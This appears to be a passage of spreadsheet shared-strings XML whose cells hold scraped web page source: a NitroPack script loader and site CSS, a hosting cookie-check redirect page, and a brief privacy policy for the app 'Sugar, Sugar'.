XMLHttpRequest;r.responseType="blob";r.onload=a;r.onerror=a;r.open("GET",o,true);r.send()}}&lt;/script&gt;&lt;script id="nprl"&gt;(function(e){var t=e.prototype;t.after||(t.after=function(){var e,t=arguments,n=t.length,r=0,i=this,o=i.parentNode,a=Node,c=String,u=document;if(o!==null){while(r&lt;n){(e=t[r])instanceof a?(i=i.nextSibling)!==null?o.insertBefore(e,i):o.appendChild(e):o.appendChild(u.createTextNode(c(e)));++r}}})})(Element);var NPRL,NitroResourceLoader;NPRL=NitroResourceLoader=function(){var r=window.</t>
  </si>
  <si>
    <t>URL||window.webkitURL;var t=true;var f=false;var n=2;var e=null;var q=null;var v;var i;var m=null;var o=null;var a=null;var c={touch:["touchmove","touchend"],default:["mousemove","click","keydown","wheel"]};var u=true;var B=[];var d=false;var p=[];var h=0;var s=0;var H=false;var g=0;var E=null;var D=false;var U=false;var l=false;var _=[]; var y=[];var N=[];var b=[];var Y=false;var L={};var w="noModule"in HTMLScriptElement.prototype;var F=requestAnimationFrame||mozRequestAnimationFrame||webkitRequestAnimationFrame||msRequestAnimationFrame;function R(e,t){if(!L[e]){L[e]=[]}L[e].push(t)}function G(e,t){if(L[e]){var</t>
  </si>
  <si>
    <t>n=0,r=L[e];for(var n=0;n&lt;r.length;n++){r[n].call(this,t)}}}function P(){(function(i,t){var n=null;var r=function(e){n(e)};var e=null;var o={};var a=null;var c=null;var u=0;i.addEventListener(t,function(e){if(["load","DOMContentLoaded"].indexOf(t)!=-1){if(c){A(function(){i.triggerNitroEvent(t)})}a=true}else if(t=="readystatechange"){u++;NPh.ogReadyState=u==1?"interactive":"complete";if(c&amp;&amp;c&gt;=u){NPh.documentReadyState=NPh.ogReadyState;A(function(){i.triggerNitroEvent(t)})}}});i.addEventListener(t+"Nitro",function(e){if(["load","DOMContentLoaded"].indexOf(t)!=-1){if(!a){e.preventDefault();e.stopImmediatePropagation()}else{}c=true}else if(t=="readystatechange"){c=NPh.documentReadyState=="interactive"?1:2;if(u&lt;c){e.preventDefault();e.stopImmediatePropagation()}}});switch(t){case"load":e="onload";break;case"readystatechange":e="onreadystatechange";break;case"pageshow":e="onpageshow";break;default: e=null;break}if(e){Object.defineProperty(i,e,{get:function(){return n},set:function(e){if(typeof e!=="function"){n=null;i.removeEventListener(t+"Nitro",r)}else{if(!n){i.addEventListener(t+"Nitro",r)}n=e}}})}Object.defineProperty(i,"addEventListener"+t,{value:function(e){if(e!=t||!NPh.startedScriptLoading||document.currentScript&amp;&amp;document.currentScript.hasAttribute("nitro-exclude")){}else{arguments[0]+="Nitro"}i.ogAddEventListener.apply(i,arguments);o[arguments[1]]=arguments[0]}});Object.defineProperty(i,"removeEventListener"+t,{value:function(e){var t=o[arguments[1]];arguments[0]=t;i.ogRemoveEventListener.apply(i,arguments)}});Object.defineProperty(i,"triggerNitroEvent"+t,{value:function(e,t){t=t||i;var n=new Event(e+"Nitro",{bubbles:true});n.isNitroPack=true;Object.defineProperty(n,"type",{get:function(){return e},set:function(){}});Object.defineProperty(n,"target",{get:function(){return t},set:function(){}});i.dispatchEvent(n)}});if(typeof i.triggerNitroEvent==="undefined"){(function(){var n=i.addEventListener;var r=i.removeEventListener;Object.defineProperty(i,"ogAddEventListener",{value:n});Object.defineProperty(i,"ogRemoveEventListener",{value:r});Object.defineProperty(i,"addEventListener",{value:function(e){var t="addEventListener"+e;if(typeof i[t]!=="undefined"){i[t].apply(i,arguments)}else{n.apply(i,arguments)}},writable:true});Object.defineProperty(i,"removeEventListener",{value:function(e){var t="removeEventListener"+e;if(typeof i[t]!=="undefined"){i[t].apply(i,arguments)}else{r.apply(i,arguments)}}});Object.defineProperty(i,"triggerNitroEvent",{value:function(e,t){var n="triggerNitroEvent"+e;if(typeof i[n]!=="undefined"){i[n].apply(i,arguments)}}})})()}}).apply(null,arguments)}P(window,"load");P(window,"pageshow");P(window,"DOMContentLoaded");P(document,"DOMContentLoaded");P(document,"readystatechange");try{var S=new Worker(r.createObjectURL(new Blob([document.getElementById("nitro-web-worker").textContent],{type:"text/javascript"})))}catch(e){var S=new Worker("data:text/javascript;base64,"+btoa(document.getElementById("nitro-web-worker").textContent))}S.onmessage=function(e){if(e.data.cmd=="RESOURCE_PRELOAD"){G(e.data.requestId,e)}};if(typeof document.baseURI!=="undefined"){S.postMessage({cmd:"SET_BASEURI",uri:document.baseURI})}var W=function(e){if(--h==0){A(K)}};var T=function(e){e.target.removeEventListener("load",T);e.target.removeEventListener("error",T);e.target.removeEventListener("nitroTimeout",T);if(e.type!="nitroTimeout"){clearTimeout(e.target.nitroTimeout)}if(--s==0&amp;&amp;h==0){A(Q)}};var X=function(e){var t=e.textContent;try{var n=r.createObjectURL(new Blob([t.replace(/^(?:&lt;!--)?(.*?)(?:--&gt;)?$/gm,"$1")],{type:"text/javascript"}))}catch(e){var n="data:text/javascript;base64,"+btoa(t.replace(/^(?:&lt;!--)?(.*?)(?:--&gt;)?$/gm,"$1"))}return n};var K=function(){NPh.documentReadyState="interactive";document.triggerNitroEvent("readystatechange");document.triggerNitroEvent("DOMContentLoaded");if(window.pageYOffset||window.pageXOffset){window.dispatchEvent(new Event("scroll"))}U=true;A(function(){if(s==0){A(Q)}A(J)})};var Q=function(){if(!U||D)return;D=true;E.disconnect();Z();NPh.documentReadyState="complete";document.triggerNitroEvent("readystatechange");window.triggerNitroEvent("load",document);window.triggerNitroEvent("pageshow",document);if(window.pageYOffset||window.pageXOffset||location.hash){let e=typeof history.scrollRestoration!=="undefined"&amp;&amp;history.scrollRestoration=="auto";if(e&amp;&amp;typeof NPSH!=="undefined"&amp;&amp;NPSH.getScrollPos()&gt;0){window.scrollTo(0,NPSH.getScrollPos())}else if(location.hash){try{let e=document.querySelector(location.hash);if(e){e.scrollIntoView()}}catch(e){}}}var e=null;if(n==1){e=M}else{e=re}A(e)};var A=function(e){setTimeout(e,0)};var O=function(e){if(e.type=="touchend"||e.type=="click"){a=e}};var J=function(){if(a){setTimeout(function(r){return function(){var e=function(e,t,n){var r=new Event(e,{bubbles:true,cancelable:true});if(e=="click"){r.clientX=t;r.clientY=n}else{r.touches=[{clientX:t,clientY:n}]}return r};var t;if(r.type=="touchend"){var n=r.changedTouches[0];t=document.elementFromPoint(n.clientX,n.clientY);t.dispatchEvent(e("touchstart"),n.clientX,n.clientY);t.dispatchEvent(e("touchend"),n.clientX,n.clientY);t.dispatchEvent(e("click"),n.clientX,n.clientY)}else if(r.type=="click"){t=document.elementFromPoint(r.clientX,r.clientY);t.dispatchEvent(e("click"),r.clientX,r.clientY)}}}(a),150);a=null}};var I=function(e){if(e.tagName=="SCRIPT"&amp;&amp;!e.hasAttribute("data-nitro-for-id")&amp;&amp;!e.hasAttribute("nitro-document-write")||e.tagName=="IMG"&amp;&amp;(e.hasAttribute("src")||e.hasAttribute("srcset"))||e.tagName=="IFRAME"&amp;&amp;e.hasAttribute("src")||e.tagName=="LINK"&amp;&amp;e.hasAttribute("href")&amp;&amp;e.hasAttribute("rel")&amp;&amp;e.getAttribute("rel")=="stylesheet"){var t="";switch(e.tagName){case"LINK":t=e.href;break;case"IMG":if(b.indexOf(e)&gt;-1)return;t=e.srcset||e.src;break;default:t=e.src;break}var n=e.getAttribute("type");if(!t&amp;&amp;e.tagName!=="SCRIPT")return;if((e.tagName=="IMG"||e.tagName=="LINK")&amp;&amp;(t.indexOf("data:")===0||t.indexOf("blob:")===0))return;if(e.tagName=="SCRIPT"&amp;&amp;n&amp;&amp;n!=="text/javascript"&amp;&amp;n!=="application/javascript"){if(n!=="module"||!w)return}if(e.tagName==="SCRIPT"){if(b.indexOf(e)&gt;-1)return;if(e.noModule&amp;&amp;w){return}if(!e.src){if(e.textContent.length&gt;0){e.textContent+="\n;if(document.currentScript.nitroTimeout) {clearTimeout(document.currentScript.nitroTimeout);}; setTimeout(function() { this.dispatchEvent(new Event('load')); }.bind(document.currentScript), 0);"}else{return}}b.push(e)}if(!e.hasOwnProperty("nitroTimeout")){s++;e.addEventListener("load",T,true);e.addEventListener("error",T,true);e.addEventListener("nitroTimeout",T,true);e.nitroTimeout=setTimeout(function(){console.log("Resource timed out",e);e.dispatchEvent(new Event("nitroTimeout"))},5e3)}}};var $=function(e){if(e.hasOwnProperty("nitroTimeout")&amp;&amp;e.nitroTimeout){clearTimeout(e.nitroTimeout);e.nitroTimeout=null;e.dispatchEvent(new Event("nitroTimeout"))}};document.documentElement.addEventListener("load",function(e){if(e.target.tagName=="SCRIPT"||e.target.tagName=="IMG"){b.push(e.target)}},true);document.documentElement.addEventListener("error",function(e){if(e.target.tagName=="SCRIPT"||e.target.tagName=="IMG"){b.push(e.target)}},true);var V=["appendChild","replaceChild","insertBefore","prepend","append","before","after","replaceWith","insertAdjacentElement"];var z=function(){V.forEach(function(t){HTMLElement.prototype["og"+t]=HTMLElement.prototype[t];HTMLElement.prototype[t]=function(...e){if(this.parentNode||this===document.documentElement){switch(t){case"replaceChild":case"insertBefore":e.pop();break;case"insertAdjacentElement":e.shift();break}e.forEach(function(e){if(!e)return;if(e.tagName=="SCRIPT"){I(e)}else{if(e.children&amp;&amp;e.children.length&gt;0){e.querySelectorAll("script").forEach(I)}}})}return this["og"+t].apply(this,arguments)}})};var Z=function(){V.forEach(function(e){HTMLElement.prototype[e]=HTMLElement.prototype["og"+e]})};var C=async function(){if(f){j(v);j(O);if(m){clearTimeout(m);m=null}}if(g===1){H=true;return}else if(g===0){g=-1}NPh.startedScriptLoading=true;Object.defineProperty(document,"readyState",{get:function(){return NPh.documentReadyState},set:function(){}});var e=document.documentElement;var t={attributes:true,attributeFilter:["src"],childList:true,subtree:true};E=new MutationObserver(function(e,t){e.forEach(function(e){if(e.type=="childList"&amp;&amp;e.addedNodes.length&gt;0){e.addedNodes.forEach(function(e){if(!document.documentElement.contains(e))return;if(e.tagName=="IMG"||e.tagName=="IFRAME"||e.tagName=="LINK"){I(e)}})}if(e.type=="childList"&amp;&amp;e.removedNodes.length&gt;0){e.removedNodes.forEach(function(e){if(e.tagName=="IFRAME"||e.tagName=="LINK"){$(e)}})}if(e.type=="attributes"){var t=e.target;if(!document.documentElement.contains(t))return;if(t.tagName=="IFRAME"||t.tagName=="LINK"||t.tagName=="IMG"||t.tagName=="SCRIPT"){I(t)}}})});E.observe(e,t);z();await Promise.all(_);var n=p.shift();var r=null;var i=false;while(n){var o;var a=JSON.parse(atob(n.meta));var c=a.delay;if(n.type=="inline"){var u=document.getElementById(n.id);if(u){u.remove()}else{n=p.shift();continue}o=X(u);if(o===false){n=p.shift();continue}}else{o=n.src}if(!i&amp;&amp;n.type!="inline"&amp;&amp;(typeof a.attributes.async!="undefined"||typeof a.attributes.defer!="undefined")){if(r===null){r=n}else if(r===n){i=true}if(!i){p.push(n);n=p.shift();continue}}var d=document.createElement("script");d.src=o;d.setAttribute("data-nitro-for-id",n.id);for(var s in a.attributes){try{if(a.attributes[s]===false){d.setAttribute(s,"")}else{d.setAttribute(s,a.attributes[s])}}catch(e){console.log("Error while setting script attribute",d,e)}}d.async=false;if(c){setTimeout(function(e,t){var n=document.querySelector("[data-nitro-marker-id='"+t+"']");if(n){n.after(e)}else{document.head.appendChild(e)}}.bind(null,d,n.id),c)}else{d.addEventListener("load",W);d.addEventListener("error",W);if(!d.noModule||!w){h++}var l=document.querySelector("[data-nitro-marker-id='"+n.id+"']");if(l){A(function(e,t){return function(){e.after(t)}}(l,d))}else{A(function(e){return function(){document.head.appendChild(e)}}(d))}}n=p.shift()}};var ee=function(){var e=document.getElementById("nitro-deferred-styles");var t=document.createElement("div");t.innerHTML=e.textContent;return t};var M=async function(e){isPreload=e&amp;&amp;e.type=="NitroPreload";if(!isPreload){g=-1;u=false;if(f){j(v);j(O);if(m){clearTimeout(m);m=null}}}if(d===false){var t=ee();let e=t.querySelectorAll('style,link[rel="stylesheet"]');d=e.length;if(d){let e=document.getElementById("nitro-deferred-styles-marker");e.replaceWith.apply(e,t.childNodes)}else if(isPreload){A(k)}else{x()}}else if(d===0&amp;&amp;!isPreload){x()}};var te=function(){var e=ee();var t=e.childNodes;var n;var r=[];for(var i=0;i&lt; t.length;i++){n=t[i];if(n.href){r.push(n.href)}}var o="css-preload";R(o,function(e){M(new Event("NitroPreload"))});if(r.length){S.postMessage({cmd:"RESOURCE_PRELOAD",resources:r,requestId:o})}else{A(function(){G(o)})}};var ne=function(){if(g===-1)return;g=1;var e=[];var t,n;for(var</t>
  </si>
  <si>
    <t>r=0;r&lt;p.length;r++){t=p[r];if(t.type!="inline"){if(t.src){n=JSON.parse(atob(t.meta));if(n.delay)continue;if(n.attributes.type&amp;&amp;n.attributes.type=="module"&amp;&amp;!w)continue;e.push(t.src)}}}if(e.length){var i="js-preload";R(i,function(e){g=2;if(H){A(C)}});S.postMessage({cmd:"RESOURCE_PRELOAD",resources:e,requestId:i})}};var re=function(){while(y.length){style=y.shift();if(style.hasAttribute("nitropack-onload")){style.setAttribute("onload",style.getAttribute("nitropack-onload"));A(function(e){return function(){e.dispatchEvent(new Event("load"))}}(style))}}while(N.length){style=N.shift();if(style.hasAttribute("nitropack-onerror")){style.setAttribute("onerror",style.getAttribute("nitropack-onerror"));A(function(e){return function(){e.dispatchEvent(new Event("error"))}}(style))}}};var k=function(){if(!Y){if(t){A(function(){var e=document.getElementById("nitro-critical-css");if(e){e.remove()}})}Y=true;onStylesLoadEvent=new Event("NitroStylesLoaded");onStylesLoadEvent.isNitroPack=true;window.dispatchEvent(onStylesLoadEvent)}};var x=function(){if(n==2){A(C)}else{re()}};var ie=function(t){i.forEach(function(e){document.addEventListener(e,t,true)})};var j=function(t){i.forEach(function(e){document.removeEventListener(e,t,true)})};return{setAutoRemoveCriticalCss:function(e){t=e},registerScript:function(e,t,n){p.push({type:"remote",src:e,id:t,meta:n})},registerInlineScript:function(e,t){p.push({type:"inline",id:e,meta:t})},registerStyle:function(e,t,n){B.push({href:e,rel:t,media:n})},onLoadStyle:function(e){y.push(e);if(d!==false&amp;&amp;--d==0){A(k);if(u){u=false}else{x()}}},onErrorStyle:function(e){N.push(e);if(d!==false&amp;&amp;--d==0){A(k);if(u){u=false}else{x()}}},loadJs:function(e,t){if(!e.src){var n=X(e);if(n!==false){e.src=n;e.textContent=""}}if(t){A(function(e,t){return function(){e.after(t)}}(t,e))}else{A(function(e){return function(){document.head.appendChild(e)}}(e))}},loadQueuedResources:async function(){if(o){clearTimeout(o);o=null}window.removeEventListener("load",NPRL.loadQueuedResources);v=n==1?C:M;if(!f||a){A(v)}else{if(navigator.userAgent.indexOf(" Edge/")==-1){te();R("css-preload",ne)}ie(v);if(q){if(e){m=setTimeout(v,e)}}else{}}},fontPreload:function(e){var t="critical-fonts";R(t,function(e){document.getElementById("nitro-critical-fonts").type="text/css"});S.postMessage({cmd:"RESOURCE_PRELOAD",resources:e,requestId:t})},boot:function(){let e=history.state;l=typeof NPSH!=="undefined"&amp;&amp;NPSH.getScrollPos()&gt;document.documentElement.clientHeight*.5;if(location.hash||l){f=false}i=c.default.concat(c.touch);o=setTimeout(NPRL.loadQueuedResources,1500);ie(O);if(l){NPRL.loadQueuedResources()}else{window.addEventListener("load",NPRL.loadQueuedResources)}},addPrerequisite:function(e){_.push(e)}}}();var NPh,NitroPackHelper;NPh=NitroPackHelper=function(){var a=document.write;return{documentWrite:function(e,t){if(e&amp;&amp;e.hasAttribute("nitro-exclude")){return a.call(document,t)}var n=null;if(e.documentWriteContainer){n=e.documentWriteContainer}else{n=document.createElement("span");e.documentWriteContainer=n}var r=null;if(e){if(e.hasAttribute("data-nitro-for-id")){r=document.querySelector('template[data-nitro-marker-id="'+e.getAttribute("data-nitro-for-id")+'"]')}else{r=e}}n.innerHTML+=t;n.querySelectorAll("script").forEach(function(e){e.setAttribute("nitro-document-write","")});if(!n.parentNode){if(r){r.parentNode.insertBefore(n,r)}else{document.body.appendChild(n)}}var i=document.createElement("span");i.innerHTML=t;var o=i.querySelectorAll("script");if(o.length){o.forEach(function(t){var e=t.getAttributeNames();var n=document.createElement("script");e.forEach(function(e){n.setAttribute(e,t.getAttribute(e))});n.async=false;if(!t.src&amp;&amp;t.textContent){n.textContent=t.textContent}NPRL.loadJs(n,r)})}},TrustLogo:function(e,t){var n=document.getElementById(e);var r=document.createElement("img");r.src=t;n.parentNode.insertBefore(r,n)},documentReadyState:"loading",ogReadyState:document.readyState,startedScriptLoading:false,loadScriptDelayed:function(t,e){setTimeout(function(){var e=document.createElement("script");e.src=t;document.head.appendChild(e)},e)}}}();document.write=function(e){NPh.documentWrite(document.currentScript,e)};document.writeln=function(e){NPh.documentWrite(document.currentScript,e+"\n")};&lt;/script&gt;&lt;template id="nitro-deferred-styles-marker"&gt;&lt;/template&gt;&lt;style type="text/css" id="nitro-critical-css"&gt;@charset "UTF-8";html,body,div,span,h1,h2,p,a,img,strong,ol,ul,li,header,nav,section{margin:0;padding:0;border:0;font-size:100%;vertical-align:baseline;background-repeat:no-repeat;}header,nav,section{display:block;}body{line-height:1;}ol,ul{list-style:none;}html{box-sizing:border-box;}*,*:before,*:after{box-sizing:inherit;}.group:after{content:"";display:table;clear:both;}a{text-decoration:none;color:black;}.button{display:inline-block;border-radius:40px;background-color:#ffa300;padding:14px 24px 16px;font-size:19px;font-size:1.9rem;letter-spacing:.03em;color:black;font-weight:700;line-height:1.3em;text-decoration:none !important;text-align:center;-webkit-appearance:none;border:none;}@media only screen and (max-width:767px){.button{font-size:16px;font-size:1.6rem;padding:10px;}}.container{width:86%;margin:0 auto;position:relative;}@media only screen and (max-width:1080px){.container{width:90%;}}@media only screen and (max-width:767px){.container{width:92%;}}#site-header{height:140px;z-index:501;position:fixed;width:100%;left:0;top:0;text-align:left;background-color:white;box-shadow:0 10px 10px rgba(66,66,66,.2);}@media only screen and (max-width:1080px){#site-header{height:100px;}}@media only screen and (max-width:767px){#site-header{height:60px;}}#site-logo{position:relative;top:16px;width:28rem;height:6rem;z-index:100;}@media only screen and (max-width:767px){#site-logo{width:170px;height:4rem;top:10px;}}#menu-icon{display:none;}@media only screen and (max-width:1080px){#menu-icon{position:fixed;top:26px;right:5%;width:50px;height:50px;display:block;}}@media only screen and (max-width:767px){#menu-icon{top:13px;right:4%;width:34px;height:34px;}}#language-icon{display:none;width:24px;height:24px;}@media only screen and (max-width:767px){#language-icon{display:inline-block;position:absolute;width:24px;height:24px;right:54px;top:19px;}}#cart-icon{display:none;}@media only screen and (max-width:1080px){#cart-icon{display:block;height:36px;width:36px;position:absolute;top:36px;right:260px;border-radius:100%;background-color:#449bef;background-image:url("https://cdn-beeel.nitrocdn.com/wIoYmlJtLoZKSSHvFDyIUPbCMHFZupCL/assets/images/optimized/rev-372c266/wp-content/themes/studycat2019/images/ic-cart.svg");background-size:24px auto;background-position:center center;}}@media only screen and (max-width:767px){#cart-icon{top:18px;height:26px;width:26px;right:96px;background-size:20px auto;}}#toolbar{position:relative;right:0;width:100%;top:0;height:40px;background-color:#449bef;text-align:right;z-index:51;}@media only screen and (max-width:1080px){#toolbar{display:none;}}#toolbar .menu-toolbar{display:flex;justify-content:space-evenly;margin-left:350px;}#toolbar .menu-toolbar li{display:inline-block;}#toolbar .menu-toolbar li a{font-size:15px;font-size:1.5rem;font-weight:400;color:white;letter-spacing:.03em;line-height:30px;height:40px;display:block;border-top:4px solid transparent;}#toolbar #header-account{float:right;height:40px;}#toolbar #header-account a{display:inline-block;height:30px;line-height:28px;font-size:15px;font-size:1.5rem;font-weight:600;letter-spacing:.03em;color:white;margin:5px 0 0 0;border-radius:20px;background-color:rgba(0,0,0,.15);padding:0 20px;}#toolbar #header-account a.studycatclub-link{position:relative;background-color:#864abb;padding-right:10px;}#language-switcher{text-align:left;position:absolute;top:-34px;left:0;width:150px;font-size:14px;font-size:1.4rem;letter-spacing:.03em;color:white;z-index:100;}@media only screen and (max-width:1080px){#language-switcher{top:38px;left:auto;right:85px;}}@media only screen and (max-width:767px){#language-switcher{display:none;right:0;top:60px;background-color:#2d8eed;width:50%;}}#language-switcher .wpml-ls-statics-shortcode_actions{background-color:transparent;}#language-switcher .wpml-ls-statics-shortcode_actions ul{background-color:transparent;padding:0;}#language-switcher .wpml-ls-statics-shortcode_actions .wpml-ls-current-language&gt;a{height:28px;border:none;color:white;display:block;font-weight:400;font-size:15px;font-size:1.5rem;border-top-left-radius:14px;border-top-right-radius:14px;border-bottom-left-radius:14px;border-bottom-right-radius:14px;padding:4px 20px 0</t>
  </si>
  <si>
    <t>26px;background-image:url("https://cdn-beeel.nitrocdn.com/wIoYmlJtLoZKSSHvFDyIUPbCMHFZupCL/assets/images/optimized/rev-372c266/wp-content/themes/studycat2019/images/ic-language.png");background-size:16px 16px;background-position:6px center;background-repeat:no-repeat;background-color:#1275d4;}#language-switcher .wpml-ls-statics-shortcode_actions .wpml-ls-current-language&gt;a.nitro-lazy{background-image:none ! important;}@media only screen and (max-width:767px){#language-switcher .wpml-ls-statics-shortcode_actions .wpml-ls-current-language&gt;a{background-image:none;padding:10px 20px 0</t>
  </si>
  <si>
    <t>10px;border-radius:0;height:40px;font-size:16px;font-size:1.6rem;}#language-switcher .wpml-ls-statics-shortcode_actions .wpml-ls-current-language&gt;a.nitro-lazy{background-image:none !important;}}#language-switcher .wpml-ls-statics-shortcode_actions .wpml-ls-current-language&gt;a span{padding:0px 0 0 6px;}#language-switcher .wpml-ls-legacy-dropdown-click .wpml-ls-sub-menu{right:auto;width:126px;left:12px;}@media only screen and (max-width:767px){#language-switcher .wpml-ls-legacy-dropdown-click .wpml-ls-sub-menu{width:100%;left:0;}}#language-switcher .wpml-ls-legacy-dropdown-click .wpml-ls-sub-menu a{border:none;height:28px;color:white;display:block;font-weight:400;font-size:14px;font-size:1.4rem;padding:5px 10px 5px 14px;background-color:#2d8eed !</t>
  </si>
  <si>
    <t>important;}@media only screen and (max-width:767px){#language-switcher .wpml-ls-legacy-dropdown-click .wpml-ls-sub-menu a{padding:10px 10px 5px 10px;height:40px;font-size:16px;font-size:1.6rem;}}#main-nav{position:absolute;width:100%;right:0;top:36px;padding:0;text-align:right;}#main-nav&gt;ul&gt;li{display:inline-block;padding:0 0 0 40px;}#main-nav&gt;ul&gt;li:last-child a{padding-right:0;}#main-nav li{display:block;position:relative;}#main-nav li a{font-family:"Studycat-Regular","Mulish",sans-serif;font-size:25px;font-size:2.5rem;font-weight:400;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;display:inline-block;padding:5px;color:#25282a;text-align:center;position:relative;word-spacing:-.2em;}#main-nav li a:before{content:"";position:absolute;background-size:cover;background-position:center center;left:50%;top:-80px;opacity:0;transform:rotate(-180deg);}@media only screen and (max-width:1080px){#main-nav li a:before{transform:rotate(0deg);}}@media only screen and (max-width:767px){#main-nav li a:before{top:7px !important;}}#main-nav li.mobile-toolbar{display:none;}#main-nav li.fe a{color:#33cdd8;}#main-nav li.fe a:before{width:30px;height:29px;margin-left:-15px;left:10%;background-image:url("https://cdn-beeel.nitrocdn.com/wIoYmlJtLoZKSSHvFDyIUPbCMHFZupCL/assets/images/optimized/rev-372c266/wp-content/themes/studycat2019/images/nav-hat-fe.svg");}#main-nav li.fs a{color:#fa5e68;}#main-nav li.fs a:before{width:48px;height:22px;top:-16px;margin-left:-24px;background-image:url("https://cdn-beeel.nitrocdn.com/wIoYmlJtLoZKSSHvFDyIUPbCMHFZupCL/assets/images/optimized/rev-372c266/wp-content/themes/studycat2019/images/nav-hat-fs.svg");}#main-nav li.fc a{color:#ff8d0c;}#main-nav li.fc a:before{width:30px;height:26px;margin-left:-15px;background-image:url("https://cdn-beeel.nitrocdn.com/wIoYmlJtLoZKSSHvFDyIUPbCMHFZupCL/assets/images/optimized/rev-372c266/wp-content/themes/studycat2019/images/nav-hat-fc.svg");transform:none;}#main-nav li.ff a{color:#4285fb;}#main-nav li.ff a:before{width:33px;height:20px;top:-14px;margin-left:-16px;background-image:url("https://cdn-beeel.nitrocdn.com/wIoYmlJtLoZKSSHvFDyIUPbCMHFZupCL/assets/images/optimized/rev-372c266/wp-content/themes/studycat2019/images/nav-hat-ff.svg");transform:none;}#main-nav li.fg a{color:#6bb513;}#main-nav li.fg a:before{width:29px;height:34px;left:100%;margin-left:-14px;background-image:url("https://cdn-beeel.nitrocdn.com/wIoYmlJtLoZKSSHvFDyIUPbCMHFZupCL/assets/images/optimized/rev-372c266/wp-content/themes/studycat2019/images/nav-hat-fg.svg");transform:none;}@media only screen and (max-width:1080px){#main-nav li.fg a:before{top:14px !</t>
  </si>
  <si>
    <t>important;}}@media only screen and (max-width:767px){#main-nav li.fg a:before{top:0px ! important;}}@media only screen and (max-width:1080px){#main-nav{display:block;position: absolute;left:100vw;top:100px;height:calc(100vh - 100px);padding:0;width:100vw;bottom:auto !important;background-color:#449bef;right:auto;}}@media only screen and (max-width:1080px) and (min-width:375px) and (max-width:812px) and (orientation:landscape){#main-nav{background-image:none;overflow-y:auto;}}@media only screen and (max-width:1080px){#main-nav ul{display:block;background-color:white;}}@media only screen and (max-width:1080px){#main-nav ul li{display:block;margin:0;float:none;text-align:left;padding:0;}#main-nav ul li:after{display:none !important;}#main-nav ul li a{font-size:28px;font-size:2.8rem;padding:20px calc(5% + 76px);text-align:left;color:#25282a;opacity:1;display:block;background-color:white;}}@media only screen and (max-width:1080px){#main-nav ul li a:before{left:4rem !</t>
  </si>
  <si>
    <t>important;top:20px ! important;opacity:1 ! important;}}@media only screen and (max-width:1080px){#main-nav ul li.mobile-toolbar{display:block;background-color:#449bef;}#main-nav ul li.mobile-toolbar a{color:white;font-family:"Mulish",Helvetica,sans-serif;font-weight:700;font-size:22px;font-size:2.2rem;background-color:transparent;word-spacing:1px;}}@media only screen and (max-width:1080px){#main-nav ul li:nth-child(5){margin-bottom:20px;}}@media only screen and (max-width:1080px){#main-nav ul li:nth-child(6){padding-top:30px;}}@media only screen and (max-width:1080px){#main-nav ul li.logout-trigger{display:none;}}.editor h2{font-size:32px;font-size:3.2rem;font-weight:700;line-height:1.2em;margin:0 auto 30px;}@media only screen and (max-width:767px){.editor h2{font-size:26px;font-size:2.6rem;line-height:1.3em;}}.editor p{line-height:1.6em;margin:0 0</t>
  </si>
  <si>
    <t>1.5em;}@media only screen and (max-width:767px){.editor p{line-height:1.5em;margin:0 0 1.3em;font-size:16px;font-size:1.6rem;}}.editor strong{font-weight:700;}.editor ol{list-style-type:decimal;margin:0 0 1.5em 1em;}.editor ol li{margin:0 0 .5em</t>
  </si>
  <si>
    <t>0;line-height:1.6em;}@media only screen and (max-width:1080px){#cookie-notice #cn-notice-text{width:58%;margin:10px auto 5px;}}#cookie-notice #cn-</t>
  </si>
  <si>
    <t>&lt;html&gt;&lt;body&gt;&lt;script type="text/javascript" src="/aes.js" &gt;&lt;/script&gt;&lt;script&gt;function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&amp;&amp;arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f&lt;d.length;f++)e+=(16&gt;d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("b56edef179c6a82c71f3701c557e693c");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://techmasterplus.com/android/privacy/offline-sudoku.php?i=1";&lt;/script&gt;&lt;noscript&gt; This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support&lt;/noscript&gt;&lt;/body&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta charset="UTF-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
&lt;link rel="stylesheet" type="text/css" href="bbnewstyle1801.css"&gt;
&lt;title&gt;privacy policy, Sugar, Sugar &lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div class="bio"&gt;
&lt;h1&gt;"Sugar, Sugar", Privacy Policy&lt;/h1&gt;
&lt;br&gt;
&lt;p&gt;
 This page is used to inform you regarding my policies with the collection, use and disclosure of personal information for my app "Sugar, Sugar". I respect the privacy of my users and I'm committed to protect the user's information, be it yours or your children's.</t>
  </si>
  <si>
    <t xml:space="preserve">I believe that you have a right to know my practices regarding the information I may collect and use when you use my app.
 &lt;br&gt;&lt;br&gt;
The "Sugar, Sugar" app collects no personal data at all.&lt;br&gt;&lt;br&gt;
&lt;br&gt;&lt;br&gt;
If you have any questions about this Privacy Policy please contact me at bontegames@gmail.com
&lt;br&gt;&lt;br&gt;
Bart Bonte
&lt;br&gt;
&lt;a href="https://bartbonte.com"&gt;bartbonte.com&lt;/a&gt;
&lt;br&gt;
August 2019
&lt;br&gt;&lt;br&gt;
&lt;/p&gt;
 &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html lang="en"&gt;
&lt;!--[if lt IE 7]&gt;&lt;html lang="en-US" class="no-js lt-ie9 lt-ie8 lt-ie7"&gt;&lt;![endif]--&gt;
&lt;!--[if (IE 7)&amp;!(IEMobile)]&gt;&lt;html lang="en-US" class="no-js lt-ie9 lt-ie8"&gt;&lt;![endif]--&gt;
&lt;!--[if</t>
  </si>
  <si>
    <t>(IE 8)&amp;!(IEMobile)]&gt;&lt;html lang="en-US" class="no-js lt-ie9"&gt;&lt;![endif]--&gt;
&lt;!--[if gt IE 8]&gt;&lt;!--&gt; &lt;html lang="en-US" class="no-js"&gt;&lt;!--&lt;![endif]--&gt;
&lt;head&gt;
